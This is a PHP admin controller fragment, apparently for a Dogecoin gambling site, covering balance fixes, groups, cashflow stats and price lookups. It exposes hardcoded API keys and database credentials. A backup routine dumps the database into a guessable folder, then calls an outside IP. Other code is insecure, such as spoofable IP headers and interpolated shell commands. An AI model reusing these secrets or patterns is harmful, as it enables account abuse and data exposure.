		$new_email = $this->input->post_get('new_email');
		if($user_id == 0) {
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid user ID!'));
		} else if (!filter_var($new_email, FILTER_VALIDATE_EMAIL)){
			echo json_encode(array('ret' => 0, 'mes' => 'Email must be a valid email!'));
		} else if ($this->User->check_email_already_exists($new_email)){
			echo json_encode(array('ret' => 0, 'mes' => 'Email already exists!'));
		} else {
			$this->User->update_user_info_by_id($user_id, 'user_email', $new_email);
			$this->Log->create_log($user_id, 'Correct email "'.$old_email.'" to "'.$new_email.'"', $this->get_client_ip());
			echo json_encode(array('ret' => 1, 'mes' => 'Correct email successfully!'));
		}
	}
	
	public function process_fix_balance_discrepancy() {
		$user_id = $this->input->post_get('user_id');
		$get_user_info = $this->User->get_user_info_by_id($user_id);
		$balance = $get_user_info->balance;
		$expected_balance = $get_user_info->total_deposits + $get_user_info->total_bonuses + $get_user_info->amount_claims + $get_user_info->total_survey_rewards + $get_user_info->amount_wins - $get_user_info->amount_losses - $get_user_info->total_withdrawals - $get_user_info->pending_balance;
		if($expected_balance > $balance) {
			$this->User->update_user_info_by_id($user_id, 'balance', $expected_balance, 0);
			echo json_encode(array('ret' => 1, 'mes' => 'Balance has been changed successfully!'));
		} else if($expected_balance < $balance) {
			$this->User->update_user_info_by_id($user_id, 'amount_losses', $get_user_info->amount_losses + $expected_balance - $balance, 0);
			echo json_encode(array('ret' => 1, 'mes' => 'Balance has been changed successfully!'));
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'No balance adjustment needed.!'.$expected_balance));
		}
	}
	
	//group feature
	public function process_create_group() {
		$name = $this->input->post('group_name', TRUE);
		$desc = $this->input->post('group_description', TRUE);
		if($name) {
			$this->Group->create_group($name, $desc);
			$group_id = $this->db->insert_id();
			if($group_id > 0) {
				echo json_encode(array('ret' => 1, 'group_id' => $group_id, 'group_name' => $name, 'mes' => 'New group created successfully!'));
			} else {
				echo json_encode(array('ret' => 0, 'mes' => 'An error occurred!'));
			}
			
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'Group name is required!'));	
		}
	}
	public function process_delete_group() {
		$group_id = $this->input->post('group_id', TRUE);
		if($group_id) {
			$this->Group->delete_group($group_id);
			$groups = $this->Group->get_all_groups();
			$group_options = [];
			foreach ($groups as $g) {
				$group_options[] = [
					'group_id' => $g->group_id,
					'group_name' => $g->group_name
				];
			}

			echo json_encode(array('ret' => 1, 'groups' => $group_options, 'mes' => 'Delete group successfully!'));
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'Group ID is required!'));	
		}
	}
	public function process_add_user_to_group() {
		$user_id = $this->input->post('user_id', TRUE);
		$group_id = $this->input->post('group_id', TRUE);
		if (!$user_id || !$group_id) {
			echo json_encode(['ret' => 0, 'mes' => 'User ID and Group ID are required']);
			return;
		}
		$result = $this->Group->add_user_to_group($user_id, $group_id);
		if ($result) {
			echo json_encode(['ret' => 1, 'mes' => 'User added to group successfully']);
		} else {
			echo json_encode(['ret' => 0, 'mes' => 'User already in group or failed']);
		}
	}
	
	public function process_remove_user_from_group() {
		$user_id = $this->input->post('user_id', TRUE);
		$group_id = $this->input->post('group_id', TRUE);

		if (!$user_id || !$group_id) {
			echo json_encode(['ret' => 0, 'mes' => 'User ID and Group ID are required']);
			return;
		}

		$res = $this->Group->remove_user_from_group($user_id, $group_id);
		if ($res) {
			echo json_encode(['ret' => 1, 'mes' => 'User removed from group successfully']);
		} else {
			echo json_encode(['ret' => 0, 'mes' => 'Failed to remove user from group']);
		}
	}
	//group feature
	
	public function load_cashflow_by_date_range() {
		$start = $this->input->get('start');
        $end = $this->input->get('end');
        $group_mode = $this->input->get('group_mode') ?? 'day';
		$unit = $this->input->get('unit') ?? 'DOGE';
        $result = $this->Request->get_cashflow_by_range($start, $end, $group_mode, $unit);
		header('Content-Type: application/json');
		echo json_encode($result);
	}
	
	public function load_cashflow_from_user_by_date_range() {
		$user_id = $this->input->get('user_id');
		$start = $this->input->get('start');
        $end = $this->input->get('end');
        $group_mode = $this->input->get('group_mode') ?? 'day';
		$unit = $this->input->get('unit') ?? 'DOGE';
        $result = $this->Request->get_cashflow_from_user_by_range($user_id, $start, $end, $group_mode, $unit);
		header('Content-Type: application/json');
		echo json_encode($result);
	}
	
	public function load_cashflow_from_referrer_by_date_range() {
		$referrer = $this->input->get('referrer');
		$start = $this->input->get('start');
        $end = $this->input->get('end');
        $group_mode = $this->input->get('group_mode') ?? 'day';
		$unit = $this->input->get('unit') ?? 'DOGE';
        $result = $this->Request->get_cashflow_from_referrer_by_range($referrer, $start, $end, $group_mode, $unit);
		header('Content-Type: application/json');
		echo json_encode($result);
	}
	
	//group feature
	public function load_cashflow_from_group_by_date_range() {
		$group_id = $this->input->get('group_id');
		$start = $this->input->get('start');
		$end = $this->input->get('end');
		$group_mode = $this->input->get('group_mode') ?? 'day';
		$unit = $this->input->get('unit') ?? 'DOGE';
		$result = $this->Request->get_cashflow_from_group_by_range($group_id, $start, $end, $group_mode, $unit);
		header('Content-Type: application/json');
		echo json_encode($result);
	}
	//group feature
	
	public function load_registered_users_by_range() {
		$start = $this->input->get('start');
		$end = $this->input->get('end');
		$group_mode = $this->input->get('group_mode') ?? 'day';

		$result = $this->User->get_registered_users_by_range($start, $end, $group_mode);

		header('Content-Type: application/json');
		echo json_encode($result);
	}
	
	public function load_registered_users_by_referrer_range() {
		$referrer = $this->input->get('referrer');
		$start = $this->input->get('start');
		$end = $this->input->get('end');
		$group_mode = $this->input->get('group_mode') ?? 'day';

		$result = $this->User->get_registered_users_by_referrer_range($referrer, $start, $end, $group_mode);

		header('Content-Type: application/json');
		echo json_encode($result);
	}
	
	public function load_survey_summary_by_day() {
		$unit = $this->input->get('unit') ?? 'DOGE';
		$start = $this->input->get('start');
		$end = $this->input->get('end');

		$result = $this->Survey->get_daily_summary($unit, $start, $end);

		header('Content-Type: application/json');
		echo json_encode($result);
	}
	
	public function load_game_stats_by_day() {
        $start = $this->input->get('start');
        $end = $this->input->get('end');

        if (!$start || !$end) {
            $end = date('Y-m-d');
            $start = date('Y-m-d', strtotime('-9 days'));
        }
        $result = $this->Game->get_daily_stats($start, $end);
		header('Content-Type: application/json');
		echo json_encode($result);
    }
	
	public function floorp($val, $precision) {
		$mult = pow(10, $precision);
		return floor($val * $mult) / $mult;
	}
	
	public function validateAddress($address){
        try {
			$decoded = $this->decodeBase58($address);
		} catch (Exception $e) {
			return false;
		}
        $d1 = hash("sha256", substr($decoded,0,21), true);
        $d2 = hash("sha256", $d1, true);
        if(substr_compare($decoded, $d2, 21, 4)){
            return false;
        }
        return true;
	}
	
	function get_cryptocurrency_price($symbol = 'DOGE') {
		$cryptocurrency_price = $this->cache->get($symbol.'_price');
		if($cryptocurrency_price) {
			return $cryptocurrency_price;
		}

		$url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest';
		$parameters = [
		  'start' => '1',
		  'limit' => '5000',
		  'convert' => 'USD'
		];

		$headers = [
		  'Accepts: application/json',
		  'X-CMC_PRO_API_KEY: 6efd849d-4629-4338-9893-5dda5b214d7d'
		];
		$qs = http_build_query($parameters); // query string encode the parameters
		$request = "{$url}?{$qs}"; // create the request URL


		$curl = curl_init(); // Get cURL resource
		// Set cURL options
		curl_setopt_array($curl, array(
		  CURLOPT_URL => $request,            // set the request URL
		  CURLOPT_HTTPHEADER => $headers,     // set the headers 
		  CURLOPT_RETURNTRANSFER => 1         // ask for raw response instead of bool
		));

		$response = curl_exec($curl); // Send the request, save the response
		$response_decode = json_decode($response);
		curl_close($curl); // Close request
		for($i = 0; $i < count($response_decode->data); $i++) {
			if($response_decode->data[$i]->symbol == $symbol) {
				$cryptocurrency_price = $response_decode->data[$i]->quote->USD->price;
				$this->cache->save($symbol.'_price', $cryptocurrency_price, 10800);
				$this->Statistic->set_statistic_by_date('DOGE_price', floor($cryptocurrency_price * 10000), date("Y-m-d"));
				return $cryptocurrency_price;
			}
		}
		return 0;
	}
	
	function get_DOGE_price_from_coingecko() {
		// Lấy từ cache trước
		$cryptocurrency_price = $this->cache->get('DOGE_price');
		if ($cryptocurrency_price) {
			return (float)$cryptocurrency_price;
		}

		$url = 'https://api.coingecko.com/api/v3/simple/price?ids=dogecoin&vs_currencies=usd';

		// Thêm timeout để tránh treo
		$context = stream_context_create(['http' => ['timeout' => 5]]);
		$ret = @file_get_contents($url, false, $context);

		// Lấy giá từ DB để fallback
		$DOGE_price_from_db = (float) round($this->Statistic->get_statistic_by_date('DOGE_price') / 10000, 6);

		if ($ret !== false && $ret != '') {
			$data = json_decode($ret, true);
			if (isset($data['dogecoin']['usd']) && is_numeric($data['dogecoin']['usd'])) {
				// Làm tròn 6 chữ số thập phân (DOGE giá rất nhỏ)
				$cryptocurrency_price = (float) round($data['dogecoin']['usd'], 6);

				// So sánh với giá DB để phát hiện bất thường
				if ($DOGE_price_from_db > 0) {
					if (
						$cryptocurrency_price <= 0 ||
						$cryptocurrency_price < $DOGE_price_from_db * 0.5 ||
						$cryptocurrency_price > $DOGE_price_from_db * 2
					) {
						$cryptocurrency_price = $DOGE_price_from_db;
					}
				}

				// Lưu vào cache & DB
				$this->cache->save('DOGE_price', $cryptocurrency_price, 1800);
				$this->Statistic->set_statistic_by_date('DOGE_price', (int) floor($cryptocurrency_price * 10000), date("Y-m-d"));
				return $cryptocurrency_price;
			}
		}

		// Nếu API fail → fallback DB
		if ($DOGE_price_from_db > 0) {
			return $DOGE_price_from_db;
		}

		return 0;
	}
	
	public function decodeBase58($input) {
		$alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz";
		$out = array_fill(0, 25, 0);
		for($i=0;$i<strlen($input);$i++){
			if(($p=strpos($alphabet, $input[$i]))===false){
				throw new \Exception("invalid character found");
			}
			$c = $p;
			for ($j = 25; $j--; ) {
				$c += (int)(58 * $out[$j]);
				$out[$j] = (int)($c % 256);
				$c /= 256;
				$c = (int)$c;
			}
			if($c != 0){
				throw new \Exception("address too long");
			}
		}
		$result = "";
		foreach($out as $val){
				$result .= chr($val);
		}
		return $result;
	}
	
	public function create_random_key($len = 8) {
		$alphabet = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
		$string = "";
		for($i = 0; $i < $len; $i++) {
			$string .= $alphabet[rand(0, strlen($alphabet) - 1)];
		}
		return $string;
	}
	
	public function get_client_ip() {
		$ipaddress = '';
		if(isset($_SERVER["HTTP_CF_CONNECTING_IP"]))
			$ipaddress = $_SERVER["HTTP_CF_CONNECTING_IP"];
		else if (getenv('HTTP_CLIENT_IP'))
			$ipaddress = getenv('HTTP_CLIENT_IP');
		else if(getenv('HTTP_X_FORWARDED_FOR'))
			$ipaddress = getenv('HTTP_X_FORWARDED_FOR');
		else if(getenv('HTTP_X_FORWARDED'))
			$ipaddress = getenv('HTTP_X_FORWARDED');
		else if(getenv('HTTP_FORWARDED_FOR'))
			$ipaddress = getenv('HTTP_FORWARDED_FOR');
		else if(getenv('HTTP_FORWARDED'))
		   $ipaddress = getenv('HTTP_FORWARDED');
		else if(getenv('REMOTE_ADDR'))
			$ipaddress = getenv('REMOTE_ADDR');
		else
			$ipaddress = 'UNKNOWN';
		return $ipaddress;
	}
	
	public function time_elapsed_string($ptime) {
		$etime = abs(time() - $ptime);
		$a = array( 365 * 24 * 60 * 60  =>  'year',
					 30 * 24 * 60 * 60  =>  'month',
						  24 * 60 * 60  =>  'day',
							   60 * 60  =>  'hour',
									60  =>  'minute',
									 1  =>  'second');
		$a_plural = array( 'year'   => 'years',
						   'month'  => 'months',
						   'day'    => 'days',
						   'hour'   => 'hours',
						   'minute' => 'minutes',
						   'second' => 'seconds');
		foreach ($a as $secs => $str) {
			$d = $etime / $secs;
			if ($d >= 1) {
				$r = round($d);
				return $r . ' ' . ($r > 1 ? $a_plural[$str] : $str);
				/*if(time() > $ptime) {
					return $r . ' ' . ($r > 1 ? $a_plural[$str] : $str) . ' ago';
				} else {
					return $r . ' ' . ($r > 1 ? $a_plural[$str] : $str);
				}*/
			}
		}
	}
	
	public function update_contest_data() {
		date_default_timezone_set("UTC");
		$day = date('w');
		if($day == 0) {
			$day = 7;
		}
		$week_start = strtotime('-'.($day-1).' days midnight');
		$week_end = strtotime('+'.(8-$day).' days midnight');

		// wagered contest
		$wagering_contest = $this->User->get_wagering_contest($week_start, $week_end);

		for($i = 0; $i < count($wagering_contest); $i++) {
			switch($i) {
				case 0:
				$wagering_contest[$i]->reward = 400 * $this->UNITS_PER_COIN;
				break;
				case 1:
				$wagering_contest[$i]->reward = 350 * $this->UNITS_PER_COIN;
				break;
				case 2:
				$wagering_contest[$i]->reward = 300 * $this->UNITS_PER_COIN;
				break;
				case 3:
				$wagering_contest[$i]->reward = 250 * $this->UNITS_PER_COIN;
				break;
				case 4:
				$wagering_contest[$i]->reward = 200 * $this->UNITS_PER_COIN;
				break;
				case 5:
				$wagering_contest[$i]->reward = 150 * $this->UNITS_PER_COIN;
				break;
				case 6:
				$wagering_contest[$i]->reward = 100 * $this->UNITS_PER_COIN;
				break;
				case 7:
				$wagering_contest[$i]->reward = 90 * $this->UNITS_PER_COIN;
				break;
				case 8:
				$wagering_contest[$i]->reward = 80 * $this->UNITS_PER_COIN;
				break;
				case 9:
				$wagering_contest[$i]->reward = 70 * $this->UNITS_PER_COIN;
				break;
			}
			
		}
		
		// referral contest
		$referral_contest = $this->User->get_referral_contest($week_start, $week_end);
		if($referral_contest != null) {
			for($i = 0; $i < count($referral_contest); $i++) {
				switch($i) {
					case 0:
					$referral_contest[$i]->reward = 400 * $this->UNITS_PER_COIN;
					break;
					case 1:
					$referral_contest[$i]->reward = 350 * $this->UNITS_PER_COIN;
					break;
					case 2:
					$referral_contest[$i]->reward = 300 * $this->UNITS_PER_COIN;
					break;
					case 3:
					$referral_contest[$i]->reward = 250 * $this->UNITS_PER_COIN;
					break;
					case 4:
					$referral_contest[$i]->reward = 200 * $this->UNITS_PER_COIN;
					break;
					case 5:
					$referral_contest[$i]->reward = 150 * $this->UNITS_PER_COIN;
					break;
					case 6:
					$referral_contest[$i]->reward = 100 * $this->UNITS_PER_COIN;
					break;
					case 7:
					$referral_contest[$i]->reward = 90 * $this->UNITS_PER_COIN;
					break;
					case 8:
					$referral_contest[$i]->reward = 80 * $this->UNITS_PER_COIN;
					break;
					case 9:
					$referral_contest[$i]->reward = 70 * $this->UNITS_PER_COIN;
					break;
				}
				
			}
		}
		
		if($wagering_contest != null && $referral_contest != null) {
			$this->Contest->update_contest_data(json_encode(array(
				'wagering_contest'	=> $wagering_contest,
				'referral_contest'	=> $referral_contest
			)));
		}
	}
	
	public function create_pagination($page_id, $total_pages, $link) {
		$page_id = min($page_id , $total_pages);
		$pagination = "";
		if($total_pages > 0) {
			if (strpos($link, '?') !== false) {
				$pagination .= '<a href="'.$link.'&p=1">First</a>';
			} else {
				$pagination .= '<a href="'.$link.'/?p=1">First</a>';
			}	
			$previous_pages = 2 + max(0, ($page_id + 2) - $total_pages);
			$next_pages = 2 + max(0, 3 - $page_id);
			for($i = max(1, $page_id - $previous_pages); $i < $page_id; $i++) {
				if (strpos($link, '?') !== false) {
					$pagination .= '<a href="'.$link.'&p='.$i.'">'.$i.'</a>';
				} else {
					$pagination .= '<a href="'.$link.'/?p='.$i.'">'.$i.'</a>';
				}
			}
			if (strpos($link, '?') !== false) {
				$pagination .= '<a href="'.$link.'&p='.$page_id.'" class="active">'.$page_id.'</a>';
			} else {
				$pagination .= '<a href="'.$link.'/?p='.$page_id.'" class="active">'.$page_id.'</a>';
			}
			
			for($i = $page_id + 1; $i <= min($total_pages, $page_id + $next_pages); $i++) {
				if (strpos($link, '?') !== false) {
					$pagination .= '<a href="'.$link.'&p='.$i.'">'.$i.'</a>';
				} else {
					$pagination .= '<a href="'.$link.'/?p='.$i.'">'.$i.'</a>';
				}
			}
			if (strpos($link, '?') !== false) {
				$pagination .= '<a href="'.$link.'&p='.$total_pages.'">Last</a>';
			} else {
				$pagination .= '<a href="'.$link.'/?p='.$total_pages.'">Last</a>';
			}
		}
		return $pagination;	
	}
	
	function blockdaemon_get_transaction_info($txid){
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, 'https://svc.blockdaemon.com/universal/v1/dogecoin/mainnet/tx/'.$txid);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_HTTPHEADER, [
			'X-API-Key: zpka_48f5dbf4877a43f188d566c1f90f7cdb_5db01d81', //gabrielfatima145@gmail.com
			'accept: application/json'
		]);
		$response = curl_exec($ch);

		if (curl_errno($ch)) {
			//echo 'Error:' . curl_error($ch);
			curl_close($ch);
			return null;
		} else {
			curl_close($ch);
			$transaction_info = json_decode($response);
			if(!isset($transaction_info->events) || !is_array($transaction_info->events)) {
				return null;
			}
			$events = $transaction_info->events;
			$outputs = array();
			for($i = 0; $i < count($events); $i++) {
				if($events[$i]->type == 'utxo_output') {
					$address = $events[$i]->destination;
					$amount = $events[$i]->amount;
					if(array_key_exists($address, $outputs)) {
						$outputs[$address] += $amount;
					} else {
						$outputs[$address] = $amount;
					}
				}
			}
			return array(
				'txid' => $transaction_info->id,
				'outputs' => $outputs,
				'time' => $transaction_info->date,
			);
		}
		
	}
	
	public function process_backup_db($force_backup = false) {
        $last_auto_backup = intval($this->getSettingData('last_auto_backup'));
		$time_limit = $force_backup ? 300 : 14400;
		if($last_auto_backup >= time() - $time_limit) {
			if ($force_backup) {
				echo json_encode(array('ret' => 0, 'mes' => 'Backup skipped: Not enough time has passed.'));
			}
			return;
		}
		$this->saveSettingData('last_auto_backup', time());
		
		$url = base_url().'adm/backup.php';
		$cmd = "curl -s -o /dev/null $url > /dev/null 2>&1 &";
		exec($cmd);
		if ($force_backup) {
			echo json_encode(array('ret' => 1, 'mes' => 'Starting backup!'));
		}
    }
	
	public function background_backup_db() {
		$db_host = "localhost";
        $db_user = "root2";
        $db_pass = "dpick11@$11";
        $db_name = "dogepick";
        $backup_dir =  "mysql_backup123/";
		$backup_file = $backup_dir . "dogepick.sql.gz";
		$command = "mysqldump -h $db_host -u $db_user -p'$db_pass' --single-transaction --skip-lock-tables $db_name --ignore-table=$db_name.ez_games --ignore-table=$db_name.ez_logs --ignore-table=$db_name.ez_confirmations --ignore-table=$db_name.ez_notifications --ignore-table=$db_name.ez_countries | gzip > $backup_file";
		exec($command, $output, $return_var);
		if ($return_var === 0) {
			$url = 'http://84.247.145.55/backup/dogepick.php';
			$cmd = "curl -s -o /dev/null $url > /dev/null 2>&1 &";
			exec($cmd);
		}
	}
	
	
	/**
     * Enable a setting (Set value to 1)
     * If the key does not exist, it will be added.
     * If the key exists but has a value of 0, it will be updated to 1.
     */
	public function enableSetting($key) {
        $settings = $this->read_settings();
        
        if (!isset($settings[$key]) || $settings[$key] == 0) {
            $settings[$key] = 1; // Add new or update to 1
        }

        $this->write_settings($settings);
        //echo "✅ `$key` has been enabled (set to 1)";
    }

    /**
     * Disable a setting (Set value to 0)
     * If the key exists and has a value of 1, it will be updated to 0.
     */
    public function disableSetting($key) {
        $settings = $this->read_settings();

        if (isset($settings[$key]) && $settings[$key] == 1) {
            $settings[$key] = 0;
        }

        $this->write_settings($settings);
       // echo "✅ `$key` has been disabled (set to 0)";
    }

    /**
     * Check if a setting is enabled
     * Returns true if the key exists and its value is 1
     * Returns false if the key is 0 or does not exist.
     */
    public function isSettingEnabled($key) {
        $settings = $this->read_settings();
        return isset($settings[$key]) && $settings[$key] == 1 ? true : false;
    }

    /**
     * Read settings from the settings.txt file and return as a key-value array
     */
    private function read_settings() {
        if (!file_exists($this->settings_file)) {
            return []; // Return an empty array if the file does not exist
        }

        $settings = [];
        $lines = file($this->settings_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

        foreach ($lines as $line) {
            list($key, $value) = array_map('trim', explode('=', $line, 2));
            $settings[$key] = (int) $value; // Convert value to an integer (0 or 1)
        }

        return $settings;
    }

    /**
     * Write settings to the settings.txt file from a key-value array
     */
    private function write_settings($settings) {
        $content = "";
        foreach ($settings as $key => $value) {
            $content .= "$key = $value\n";
        }
        file_put_contents($this->settings_file, $content);
    }
	
	
    /**
     * Store a data value in the settings file
     * If the key exists, update it; otherwise, add a new entry.
     */
    public function saveSettingData($key, $value) {
        $settings = $this->read_settings();
        $settings[$key] = $value;

        $this->write_settings($settings);
        //echo "✅ `$key` has been updated to `$value`";
    }

    /**
     * Retrieve a data value from the settings file
     * Returns the value if the key exists, otherwise returns "null".
     */
    public function getSettingData($key) {
        $settings = $this->read_settings();
        return isset($settings[$key]) ? $settings[$key] : '';
    }

    /**
     * Remove a data entry from the settings file
     */
    public function removeData($key) {
        $settings = $this->read_settings();

        if (isset($settings[$key])) {
            unset($settings[$key]);
            $this->write_settings($settings);
           // echo "✅ `$key` has been removed";
        } else {
            //echo "❌ `$key` does not exist";
        }
    }
	
}
